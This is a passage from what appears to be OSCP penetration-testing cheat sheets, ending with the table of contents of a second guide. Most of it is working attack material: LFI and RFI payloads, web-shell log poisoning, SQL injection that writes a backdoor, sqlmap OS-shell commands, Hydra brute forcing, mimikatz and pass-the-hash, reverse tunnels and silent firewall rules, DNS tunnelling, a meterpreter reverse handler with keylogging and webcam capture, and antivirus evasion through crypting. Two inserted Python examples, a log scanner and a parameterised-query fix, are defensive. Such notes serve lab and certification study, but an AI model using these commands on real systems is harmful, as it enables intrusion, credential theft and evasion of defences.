1446 | - LFI - Download file with base 64 encoding
1447 | http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php
1448 |
1449 | - LFI Linux Files:
1450 | /etc/issue
1451 | /proc/version
1452 | /etc/profile
1453 | /etc/passwd
1455 | /etc/shadow
1456 | /root/.bash\_history
1457 | /var/log/dmessage
1458 | /var/mail/root
1459 | /var/spool/cron/crontabs/root
1460 |
1461 | - LFI Windows Files:
1462 | %SYSTEMROOT%\\repair\\system
1463 | %SYSTEMROOT%\\repair\\SAM
1465 | %WINDIR%\\win.ini
1466 | %SYSTEMDRIVE%\\boot.ini
1467 | %WINDIR%\\Panther\\sysprep.inf
1468 | %WINDIR%\\system32\\config\\AppEvent.Evt
1469 |
1470 | - LFI OSX Files:
1471 | /etc/fstab
1472 | /etc/master.passwd
1473 | /etc/resolv.conf
1474 | /etc/sudoers
1475 | /etc/sysctl.conf
1476 |
1477 | - LFI - Download passwords file
1478 | http://$ip/index.php?page=/etc/passwd
1479 | http://$ip/index.php?file=../../../../etc/passwd
1480 |
1481 | - LFI - Download passwords file with filter evasion
1482 | http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd
1483 |
1484 | - Local File Inclusion - In versions of PHP below 5.3 we can
1485 | terminate with null byte
1486 | GET
1487 | /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
1488 |
1489 | - Contaminating Log Files <?php echo
1490 | shell\_exec($\_GET\['cmd'\]);?>
1491 |
1492 | - For a Remote File Inclusion look for PHP code that is not
1493 | sanitized before being passed to the PHP include function; the php.ini
1494 | file must also be configured to allow remote files
1495 | (/etc/php5/cgi/php.ini - “allow\_url\_fopen” and
1496 | “allow\_url\_include” both set to “on”)
1497 | include($\_REQUEST\["file"\].".php");
1498 |
1499 | - Remote File Inclusion
1500 | [http://$ip/addguestbook.php?name=a&comment=b&LANG=http://$localip/evil.txt](http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt)
1501 | <?php echo shell\_exec("ipconfig");?>
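Added example (not part of the cheat sheet): a Python scanner for Apache combined-format access logs that flags the Shellshock User-Agent from the Shellshock section above and the LFI/RFI request shapes from this section (traversal, php:// wrappers, %00 truncation, remote URLs in parameters). The log lines are constructed from those requests; the 10.0.0.x addresses are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed Apache "combined" log lines modelled on the requests in this sheet (not real traffic).
SAMPLE_LOG = r'''
10.0.0.5 - - [10/May/2016:12:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/May/2016:12:00:02 +0000] "HEAD /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :;}; echo $(</etc/passwd)"
10.0.0.9 - - [10/May/2016:12:00:03 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=admin.php HTTP/1.1" 200 2048 "-" "curl/7.47.0"
10.0.0.9 - - [10/May/2016:12:00:04 +0000] "GET /index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1400 "-" "curl/7.47.0"
10.0.0.9 - - [10/May/2016:12:00:05 +0000] "GET /addguestbook.php?name=a&comment=b&LANG=http://10.0.0.9/evil.txt HTTP/1.1" 200 77 "-" "curl/7.47.0"
10.0.0.9 - - [10/May/2016:12:00:06 +0000] "GET /addguestbook.php?LANG=../../../../windows/system32/drivers/etc/hosts%00 HTTP/1.1" 200 77 "-" "curl/7.47.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# (rule name, field inspected, pattern). "target" is the URL-decoded request target.
RULES = [
    ("shellshock-user-agent", "ua",     re.compile(r"\(\)\s*\{")),
    ("lfi-path-traversal",    "target", re.compile(r"\.\./|\.\.\\")),
    ("lfi-php-wrapper",       "target", re.compile(r"\b(php|file|expect|phar|zip)://|\bdata:", re.I)),
    ("lfi-null-byte",         "target", re.compile("\x00")),
    ("lfi-sensitive-file",    "target", re.compile(
        r"etc/(passwd|shadow)|win\.ini|boot\.ini|system32|repair[\\/]sam", re.I)),
    ("rfi-remote-url",        "target", re.compile(r"=\s*(https?|ftp)://", re.I)),
]


def scan_log(text):
    """Return one finding dict per (line, rule) match; unparseable lines are skipped."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode twice so a double-encoded %252F ("/") is caught as well as %2F.
        fields = {"ua": m["ua"], "target": unquote(unquote(m["target"]))}
        for name, field, rx in RULES:
            if rx.search(fields[field]):
                findings.append({"ip": m["ip"], "time": m["ts"],
                                 "rule": name, "request": m["target"]})
    return findings


def offenders(findings):
    """Map each source IP to the set of rules it triggered, for quick triage."""
    out = {}
    for f in findings:
        out.setdefault(f["ip"], set()).add(f["rule"])
    return out


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("%(time)s %(ip)s %(rule)s %(request)s" % f)
    print(offenders(scan_log(SAMPLE_LOG)))
```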
1502 |
1503 | - Database Vulnerabilities
1504 | ----------------------------------------------------------------------------------------------------------------------
1505 |
1506 | - MySQL SQL
1507 |
1508 | - Grab password hashes from a web application mysql database
1509 | called “Users” - once you have the MySQL root username and
1510 | password
1511 | mysql -u root -p -h $ip
1512 | use "Users"
1513 | show tables;
1514 | select \* from users;
1515 |
1516 | - Authentication Bypass
1517 | name='wronguser' or 1=1;\#
1518 | name='wronguser' or 1=1 LIMIT 1;\#
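Added example (not from the cheat sheet): the `or 1=1` bypass above run against a constructed SQLite login query next to its parameterised fix. SQLite comments with `--`, where the sheet's `;#` form is MySQL syntax; the users table and its rows are sample data.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the web app's users table (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "S3cretPass"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, name, password):
    """The flawed pattern: user input is pasted into the SQL text.

    With name = "wronguser' OR 1=1 --" the statement becomes
      SELECT name FROM users WHERE name='wronguser' OR 1=1 --' AND password='...'
    so the password check is commented out and the first row (admin) comes back.
    """
    query = "SELECT name FROM users WHERE name='%s' AND password='%s'" % (name, password)
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, name, password):
    """Parameterised query: the same input is bound as a string value, never parsed as SQL."""
    row = conn.execute(
        "SELECT name FROM users WHERE name=? AND password=?", (name, password)
    ).fetchone()
    return row[0] if row else None


def demo():
    conn = make_db()
    payload = "wronguser' OR 1=1 --"
    return {
        "vulnerable_bypass": login_vulnerable(conn, payload, "anything"),  # "admin"
        "safe_bypass": login_safe(conn, payload, "anything"),              # None
        "safe_valid": login_safe(conn, "admin", "S3cretPass"),             # "admin"
    }


if __name__ == "__main__":
    print(demo())
```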
1519 |
1520 | - Enumerating the Database
1521 | http://$ip/comment.php?id=738'
1522 | Verbose error message?
1523 | http://$ip/comment.php?id=738 order by 1
1524 | http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6
1525 | Determine MySQL Version:
1526 | http://$ip/comment.php?id=738 union all select
1527 | 1,2,3,4,@@version,6
1528 | current user being used for the database connection
1529 | http://$ip/comment.php?id=738 union all select
1530 | 1,2,3,4,user(),6
1531 | we can enumerate database tables and column structures
1532 | http://$ip/comment.php?id=738 union all select
1533 | 1,2,3,4,table\_name,6 FROM information\_schema.tables
1534 | target the users table in the database
1535 | http://$ip/comment.php?id=738 union all select
1536 | 1,2,3,4,column\_name,6 FROM information\_schema.columns where
1537 | table\_name='users'
1538 | extract the name and password
1539 | http://$ip/comment.php?id=738 union select
1540 | 1,2,3,4,concat(name,0x3a, password),6 FROM users
1541 | Create a backdoor
1542 | http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php
1543 | echo shell\_exec($\_GET\['cmd'\]);?>",6 into OUTFILE
1544 | 'c:/xampp/htdocs/backdoor.php'
1545 |
1546 | - SQLMap Examples
1547 |
1548 | - Crawl the links
1549 | sqlmap -u http://$ip --crawl=1
1550 | sqlmap -u http://meh.com --forms --batch --crawl=10
1551 | --cookie=jsessionid=54321 --level=5 --risk=3
1552 | - SQLMap Search for databases against a suspected GET SQL Injection
1553 | point ‘search’
1554 | sqlmap -u http://$ip/blog/index.php?search --dbs
1555 |
1556 | - SQLMap dump tables from database oscommerce at GET SQL injection point ‘search’
1557 | sqlmap -u http://$ip/blog/index.php?search= --dbs -D oscommerce --tables --dump
1559 | - SQLMap GET Parameter command
1560 | sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump --threads=5
1562 | - SQLMap Post Username parameter
1563 | sqlmap -u http://$ip/login.php --method=POST
1564 | --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3
1565 | --level=5 --dbms=MySQL --dump-all
1566 | - SQL Map OS Shell
1567 | sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --os-shell
1568 | sqlmap -u http://$ip/login.php --method=POST
1569 | --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3
1570 | --level=5 --dbms=MySQL --os-shell
1571 | - Automated sqlmap scan
1572 | sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
1573 | --level=3 --current-user --current-db --passwords
1574 | --file-read="/var/www/blah.php"
1575 | - Targeted sqlmap scan
1576 | sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump
1577 | - Scan url for union + error based injection with mysql backend
1578 | and use a random user agent + database dump
1579 | sqlmap -o -u http://$ip/index.php --forms --dbs
1580 | sqlmap -o -u "http://$ip/form/" --forms
1581 | sqlmap check form for injection
1582 | sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump
1583 | sqlmap dump and crack hashes for table users on database-name.
1584 |
1585 | Enumerate databases
1586 | sqlmap --dbms=mysql -u "$URL" --dbs
1587 | Enumerate tables from a specific database
1588 | sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
1589 | Dump table data from a specific database and table
1590 | sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
1591 | Specify parameter to exploit
1592 | sqlmap --dbms=mysql -u
1593 | "http://www.example.com/param1=value1&param2=value2" --dbs -p param2
1594 | Specify parameter to exploit in 'nice' URIs
1595 | sqlmap --dbms=mysql -u
1596 | "http://www.example.com/param1/value1\*/param2/value2" --dbs \#
1597 | exploits param1
1598 | Get OS shell
1599 | sqlmap --dbms=mysql -u "$URL" --os-shell
1600 | Get SQL shell
1601 | sqlmap --dbms=mysql -u "$URL" --sql-shell
1602 | SQL query
1603 | sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT \*
1604 | FROM $TABLE;"
1605 | Use Tor Socks5 proxy
1606 | sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL"
1607 | --dbs
1608 |
1609 | - Password Attacks
1610 | --------------------------------------------------------------------------------------------------------------
1611 |
1612 | - AES Decryption
1613 | http://aesencryption.net/
1614 |
1615 | - Convert multiple webpages into a word list
1616 | for x in 'index' 'about' 'post' 'contact' ; do curl
1617 | http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >>
1618 | webapp.txt ; done
1619 |
1620 | - Or convert html to word list dict
1621 | html2dic index.html.out | sort -u > index-html.dict
1622 |
1623 | - Default Usernames and Passwords
1624 |
1625 | - CIRT
1626 | [*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)
1627 |
1628 | - Government Security - Default Logins and Passwords for
1629 | Networked Devices
1630 |
1631 | - [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*](http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php)
1632 |
1633 | - Virus.org
1634 | [*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)
1635 |
1636 | - Default Password
1637 | [*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)
1638 |
1639 | - Brute Force
1640 |
1641 | - Nmap Brute forcing Scripts
1642 | [*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)
1643 |
1644 | - Nmap Generic auto detect brute force attack
1645 | nmap --script brute -Pn <target.com or ip>
1646 | <enter>
1647 |
1648 | - MySQL nmap brute force attack
1649 | nmap --script=mysql-brute $ip
1650 |
1651 | - Dictionary Files
1652 |
1653 | - Word lists on Kali
1654 | cd /usr/share/wordlists
1655 |
1656 | - Key-space Brute Force
1657 |
1658 | - crunch 6 6 0123456789ABCDEF -o crunch1.txt
1659 |
1660 | - crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
1661 |
1662 | - crunch 8 8 -t ,@@^^%%%
1663 |
1664 | - Pwdump and Fgdump - Security Accounts Manager (SAM)
1665 |
1666 | - pwdump.exe - attempts to extract password hashes
1667 |
1668 | - fgdump.exe - attempts to kill local antiviruses before
1669 | attempting to dump the password hashes and
1670 | cached credentials.
1671 |
1672 | - Windows Credential Editor (WCE)
1673 |
1674 | - allows one to perform several attacks to obtain clear text
1675 | passwords and hashes
1676 |
1677 | - wce -w
1678 |
1679 | - Mimikatz
1680 |
1681 | - extract plaintexts passwords, hash, PIN code and kerberos
1682 | tickets from memory. mimikatz can also perform
1683 | pass-the-hash, pass-the-ticket or build Golden tickets
1684 | [*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz)
1685 | From metasploit meterpreter (must have System level access):
1686 | `meterpreter> load mimikatz
1687 | meterpreter> help mimikatz
1688 | meterpreter> msv
1689 | meterpreter> kerberos
1690 | meterpreter> mimikatz_command -f samdump::hashes
1691 | meterpreter> mimikatz_command -f sekurlsa::searchPasswords`
1692 |
1693 | - Password Profiling
1694 |
1695 | - cewl can generate a password list from a web page
1696 | `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`
1697 |
1698 | - Password Mutating
1699 |
1700 | - John the ripper can mutate password lists
1701 | nano /etc/john/john.conf
1702 | `john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`
1703 |
1704 | - Medusa
1705 |
1706 | - Medusa, initiated against an htaccess protected web
1707 | directory
1708 | `medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`
1709 |
1710 | - Ncrack
1711 |
1712 | - ncrack (from the makers of nmap) can brute force RDP
1713 | `ncrack -vv --user offsec -P password-file.txt rdp://$ip`
1714 |
1715 | - Hydra
1716 |
1717 | - Hydra brute force against SNMP
1718 | `hydra -P password-file.txt -v $ip snmp`
1719 |
1720 | - Hydra FTP known user and password list
1721 | `hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp`
1722 |
1723 | - Hydra SSH using list of users and passwords
1724 | `hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh`
1725 |
1726 | - Hydra SSH using a known password and a username list
1727 | `hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh`
1728 |
1729 | - Hydra SSH Against Known username on port 22
1730 | `hydra $ip -s 22 ssh -l -P big\_wordlist.txt`
1731 |
1732 | - Hydra POP3 Brute Force
1733 | `hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f $ip pop3 -V`
1734 |
1735 | - Hydra SMTP Brute Force
1736 | `hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V`
1737 |
1738 | - Hydra attack http get 401 login with a dictionary
1739 | `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`
1740 |
1741 | - Hydra attack Windows Remote Desktop with rockyou
1742 | `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`
1743 |
1744 |
1745 | - Password Hash Attacks
1746 | -------------------------------------------------------------------------------------------------------------------
1747 |
1748 | - Online Password Cracking
1749 | [*https://crackstation.net/*](https://crackstation.net/)
1750 |
1751 | - Hashcat running on
1752 |
1753 | - Sample Hashes
1754 | [*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)
1755 |
1756 | - Identify Hashes
1757 | hash-identifier
1758 |
1759 | - Crack Linux hashes - you must first unshadow them:
1760 | unshadow passwd-file.txt shadow-file.txt
1761 | unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
1762 |
1763 | - John the Ripper - Password Hash Cracking
1764 |
1765 | - john $ip.pwdump
1766 |
1767 | - john --wordlist=/usr/share/wordlists/rockyou.txt hashes
1768 |
1769 | - john --rules --wordlist=/usr/share/wordlists/rockyou.txt
1770 |
1771 | - john --rules --wordlist=/usr/share/wordlists/rockyou.txt
1772 | unshadowed.txt
1773 |
1774 | - JTR forced descrypt cracking with wordlist
1775 | john --format=descrypt --wordlist
1776 | /usr/share/wordlists/rockyou.txt hash.txt
1777 |
1778 | - JTR forced descrypt brute force cracking
1779 | john --format=descrypt hash --show
1780 |
1781 | - Passing the Hash in Windows
1782 |
1783 | - Use Metasploit to exploit one of the SMB servers in the labs.
1784 | Dump the password hashes and attempt a pass-the-hash attack
1785 | against another system:
1786 |
1787 | export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
1789 |
1790 | pth-winexe -U administrator //$ip cmd
1791 |
1792 | Networking, Pivoting and Tunneling
1793 | ================================================================================================================================
1794 |
1795 | - Port Forwarding - accept traffic on a given IP address and port and
1796 | redirect it to a different IP address and port
1797 |
1798 | - apt-get install rinetd
1799 |
1800 | - cat /etc/rinetd.conf
1801 | \# bindadress bindport connectaddress connectport
1802 | w.x.y.z 53 a.b.c.d 80
1803 |
1804 | - SSH Local Port Forwarding: supports bi-directional communication
1805 | channels
1806 |
1807 | - ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
1809 |
1810 | - SSH Remote Port Forwarding: Suitable for popping a remote shell on
1811 | an internal non routable network
1812 |
1813 | - ssh <gateway> -R <remote port to bind>:<local host>:<local port>
1815 |
1816 | - SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
1817 | attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
1818 | network on ANY PORT
1819 |
1820 | - ssh -D <local proxy port> -p <remote port> <target>
1822 |
1823 | - Proxychains - Perform nmap scan within a DMZ from an external
1824 | computer
1825 |
1826 | - Create reverse SSH tunnel from Popped machine on :2222
1827 | ssh -f -N -R 2222:$ip:22 root@$ip
1828 |
1829 | - Create a Dynamic application-level port forward on 8080 thru
1830 | 2222
1831 | ssh -f -N -D $ip:8080 -p 2222 hax0r@$ip
1832 |
1833 | - Leverage the SSH SOCKS server to perform Nmap scan on network
1834 | using proxy chains
1835 | proxychains nmap --top-ports=20 -sT -Pn $ip/24
1836 |
1837 | - HTTP Tunneling
1838 | nc -vvn $ip 8888
1839 |
1840 | - Traffic Encapsulation - Bypassing deep packet inspection
1841 |
1842 | - http\_tunnel
1843 | On server side:
1844 | sudo hts -F <server\_ip\_addr>:<port\_of\_your\_app> 80
1846 | On client side:
1847 | sudo htc -P <my\_proxy.com:proxy\_port> -F <port\_of\_your\_app> <server\_ip\_addr>:80
1849 | stunnel
1850 |
1851 | - Tunnel Remote Desktop (RDP) from a Popped Windows machine to your
1852 | network
1853 |
1854 | - Tunnel on port 22
1855 | plink -l root -pw pass -R 3389:$ip:3389 $ip
1856 |
1857 | - Port 22 blocked? Try port 80? or 443?
1858 | plink -l root -pw 23847sd98sdf987sf98732 -R 3389:$ip:3389 $ip -P 80
1860 |
1861 | - Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel
1862 | (bypass deep packet inspection)
1863 |
1864 | - Windows machine add required firewall rules without prompting
1865 | the user
1866 |
1867 | - netsh advfirewall firewall add rule name="httptunnel\_client"
1868 | dir=in action=allow program="httptunnel\_client.exe" enable=yes
1869 |
1870 | - netsh advfirewall firewall add rule name="3000" dir=in
1871 | action=allow protocol=TCP localport=3000
1872 |
1873 | - netsh advfirewall firewall add rule name="1080" dir=in
1874 | action=allow protocol=TCP localport=1080
1875 |
1876 | - netsh advfirewall firewall add rule name="1079" dir=in
1877 | action=allow protocol=TCP localport=1079
1878 |
1879 | - Start the http tunnel client
1880 | httptunnel\_client.exe
1881 |
1882 | - Create HTTP reverse shell by connecting to localhost port 3000
1883 | plink -l root -pw 23847sd98sdf987sf98732 -R 3389:$ip:3389 $ip -P 3000
1885 |
1886 | - VLAN Hopping
1887 |
1888 | - git clone https://github.com/nccgroup/vlan-hopping.git
1889 | chmod 700 frogger.sh
1890 | ./frogger.sh
1891 |
1892 | - VPN Hacking
1893 |
1894 | - Identify VPN servers:
1895 | ./udp-protocol-scanner.pl -p ike $ip
1896 |
1897 | - Scan a range for VPN servers:
1898 | ./udp-protocol-scanner.pl -p ike -f ip.txt
1899 |
1900 | - Use IKEForce to enumerate or dictionary attack VPN servers:
1901 | pip install pyip
1902 | git clone
1903 | Perform IKE VPN enumeration with IKEForce:
1904 | ./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic
1905 | Bruteforce IKE VPN using IKEForce:
1906 | ./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
1908 | Use ike-scan to capture the PSK hash:
1909 | ike-scan
1910 | ike-scan TARGET-IP
1911 | ike-scan -A TARGET-IP
1912 | ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
1913 | ike-scan -M -A -n example\_group -P hash-file.txt TARGET-IP
1914 | Use psk-crack to crack the PSK hash
1915 | psk-crack hash-file.txt
1916 | pskcrack
1917 | psk-crack -b 5 TARGET-IPkey
1918 | psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
1921 | psk-crack -d /path/to/dictionary-file TARGET-IP-key
1922 |
1923 | - PPTP Hacking
1924 |
1925 | - Identifying PPTP, it listens on TCP: 1723
1926 | NMAP PPTP Fingerprint:
1927 | nmap -Pn -sV -p 1723 TARGET(S)
1928 | PPTP Dictionary Attack
1929 | thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
1930 |
1931 | - Port Forwarding/Redirection
1932 |
1933 | - PuTTY Link tunnel - SSH Tunneling
1934 |
1935 | - Forward remote port to local address:
1936 | plink.exe -P 22 -l root -pw "1337" -R 445:$ip:445 $ip
1937 |
1938 | - SSH Pivoting
1939 |
1940 | - SSH pivoting from one network to another:
1941 | ssh -D $ip:1010 -p 22 user@$ip
1942 |
1943 | - DNS Tunneling
1944 |
1945 | - dnscat2 supports “download” and “upload” commands for getting
1946 | files (data and programs) to and from the target machine.
1947 |
1948 | - Attacking Machine Installation:
1949 | apt-get update
1950 | apt-get -y install ruby-dev git make g++
1951 | gem install bundler
1952 | git clone https://github.com/iagox86/dnscat2.git
1953 | cd dnscat2/server
1954 | bundle install
1955 |
1956 | - Run dnscat2:
1957 | ruby ./dnscat2.rb
1958 | dnscat2> New session established: 1422
1959 | dnscat2> session -i 1422
1960 |
1961 | - Target Machine:
1962 | https://downloads.skullsecurity.org/dnscat2/
1963 | https://github.com/lukebaggett/dnscat2-powershell/
1964 | dnscat --host <dnscat server\_ip>
1965 |
1966 | The Metasploit Framework
1967 | ======================================================================================================================
1968 |
1969 | - See [*Metasploit Unleashed
1970 | Course*](https://www.offensive-security.com/metasploit-unleashed/)
1971 | in the Essentials
1972 |
1973 | - Search for exploits using Metasploit GitHub framework source code:
1974 | [*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)
1975 | Translate them for use on OSCP LAB or EXAM.
1976 |
1977 | - Metasploit
1978 |
1979 | - Metasploit requires PostgreSQL
1980 | systemctl start postgresql
1981 |
1982 | - To enable Postgresql on startup
1983 | systemctl enable postgresql
1984 |
1985 | - MSF Syntax
1986 |
1987 | - Start metasploit
1988 | msfconsole
1989 | msfconsole -q
1990 |
1991 | - Show help for command
1992 | show -h
1993 |
1994 | - Show Auxiliary modules
1995 | show auxiliary
1996 |
1997 | - Use a module
1998 | use auxiliary/scanner/snmp/snmp\_enum
1999 | use auxiliary/scanner/http/webdav\_scanner
2000 | use auxiliary/scanner/smb/smb\_version
2001 | use auxiliary/scanner/ftp/ftp\_login
2002 | use exploit/windows/pop3/seattlelab\_pass
2003 |
2004 | - Show the basic information for a module
2005 | info
2006 |
2007 | - Show the configuration parameters for a module
2008 | show options
2009 |
2010 | - Set options for a module
2011 | set RHOSTS $ip-254
2012 | set THREADS 10
2013 |
2014 | - Run the module
2015 | run
2016 |
2017 | - Execute an Exploit
2018 | exploit
2019 |
2020 | - Search for a module
2021 | search type:auxiliary login
2022 |
2023 | - Metasploit Database Access
2024 |
2025 | - Show all hosts discovered in the MSF database
2026 | hosts
2027 |
2028 | - Scan for hosts and store them in the MSF database
2029 | db\_nmap
2030 |
2031 | - Search machines for specific ports in MSF database
2032 | services -p 443
2033 |
2034 | - Leverage MSF database to scan SMB ports (auto-completed
2035 | rhosts)
2036 | services -p 443 --rhosts
2037 |
2038 | - Staged and Non-staged
2039 |
2040 | - Non-staged payload - sent in its entirety in one go
2042 |
2043 | - Staged payload - sent in two parts (a small stager first, which then fetches the rest); useful when
2044 | there is not enough buffer space for the whole payload,
2045 | or when you need to bypass antivirus
2046 |
2047 | - Experimenting with Meterpreter
2048 |
2049 | - Get system information from Meterpreter Shell
2050 | sysinfo
2051 |
2052 | - Get user id from Meterpreter Shell
2053 | getuid
2054 |
2055 | - Search for a file
2056 | search -f \*pass\*.txt
2057 |
2058 | - Upload a file
2059 | upload /usr/share/windows-binaries/nc.exe c:\\\\Users\\\\Offsec
2060 |
2061 | - Download a file
2062 | download c:\\\\Windows\\\\system32\\\\calc.exe /tmp/calc.exe
2063 |
2064 | - Invoke a command shell from Meterpreter Shell
2065 | shell
2066 |
2067 | - Exit the meterpreter shell
2068 | exit
2069 |
2070 | - Metasploit Exploit Multi Handler
2071 |
2072 | - multi/handler to accept an incoming reverse\_https\_meterpreter
2073 | payload
2074 | use exploit/multi/handler
2075 | set PAYLOAD windows/meterpreter/reverse\_https
2076 | set LHOST $ip
2077 | set LPORT 443
2078 | exploit
2079 | \[\*\] Started HTTPS reverse handler on https://$ip:443/
2080 |
2081 | - Building Your Own MSF Module
2082 |
2083 | - mkdir -p ~/.msf4/modules/exploits/linux/misc
2084 | cd ~/.msf4/modules/exploits/linux/misc
2085 | cp /usr/share/metasploit-framework/modules/exploits/linux/misc/gld\_postfix.rb ./crossfire.rb
2088 | nano crossfire.rb
2089 |
2090 | - Post Exploitation with Metasploit
2091 |
2092 | - download Download a file or directory
2093 | upload Upload a file or directory
2094 | portfwd Forward a local port to a remote service
2095 | route View and modify the routing table
2096 | keyscan\_start Start capturing keystrokes
2097 | keyscan\_stop Stop capturing keystrokes
2098 | screenshot Grab a screenshot of the interactive desktop
2099 | record\_mic Record audio from the default microphone for X seconds
2101 | webcam\_snap Take a snapshot from the specified webcam
2102 | getsystem Attempt to elevate your privilege to that of local system.
2104 | hashdump Dumps the contents of the SAM database
2105 |
2106 | - Meterpreter Post Exploitation Features
2107 |
2108 | - Create a Meterpreter background session
2109 | background
2110 |
2111 | Bypassing Antivirus Software
2112 | ===========================================================================================================================
2113 |
2114 | - Crypting Known Malware with Software Protectors
2115 |
2116 | - One such open source crypter is Hyperion:
2117 | cp /usr/share/windows-binaries/Hyperion-1.0.zip .
2118 | unzip Hyperion-1.0.zip
2119 | cd Hyperion-1.0/
2120 | i686-w64-mingw32-g++ Src/Crypter/\*.cpp -o hyperion.exe
2121 | cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc\_s\_sjlj-1.dll .
2124 | cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
2126 | wine hyperion.exe ../backdoor.exe ../crypted.exe
2127 |
--------------------------------------------------------------------------------
/oscp_human_guide.md:
--------------------------------------------------------------------------------
1 | By https://github.com/six2dez
2 |
3 |
4 |
5 | Table of Contents
6 | =================
7 |
8 | * [Table of Contents](#table-of-contents)
9 | * [Recon](#recon)
10 | * [Enumeration AIO](#enumeration-aio)
11 | * [File enumeration](#file-enumeration)
12 | * [Common](#common)
13 | * [Disk files](#disk-files)
14 | * [Images](#images)
15 | * [Audio](#audio)
16 | * [Port 21 - FTP](#port-21---ftp)
17 | * [Port 22 - SSH](#port-22---ssh)
18 | * [Port 25 - Telnet](#port-25---telnet)
19 | * [Port 69 - UDP - TFTP](#port-69---udp---tftp)
20 | * [Kerberos - 88](#kerberos---88)
21 | * [Port 110 - Pop3](#port-110---pop3)
22 | * [Port 111 - Rpcbind](#port-111---rpcbind)
23 | * [Port 135 - MSRPC](#port-135---msrpc)
24 | * [Port 139/445 - SMB](#port-139445---smb)
25 | * [Port 161/162 UDP - SNMP](#port-161162-udp---snmp)
26 | * [LDAP - 389,636](#ldap---389636)
27 | * [HTTPS - 443](#https---443)
28 | * [500 - ISAKMP IKE](#500---isakmp-ike)
29 | * [513 - Rlogin](#513---rlogin)
30 | * [541 - FortiNet SSLVPN](#541---fortinet-sslvpn)
31 | * [Port 554 - RTSP](#port-554---rtsp)
32 | * [Port 1030/1032/1033/1038](#port-1030103210331038)
33 | * [MSSQL - 1433](#mssql---1433)
34 | * [Port 1521 - Oracle](#port-1521---oracle)
35 | * [Port 2049 - NFS](#port-2049---nfs)
36 | * [Port 2100 - Oracle XML DB](#port-2100---oracle-xml-db)
37 | * [3306 - MySQL](#3306---mysql)
38 | * [Port 3339 - Oracle web interface](#port-3339---oracle-web-interface)
39 | * [RDP - 3389](#rdp---3389)
40 | * [WinRM - 5985](#winrm---5985)
41 | * [VNC - 5900](#vnc---5900)
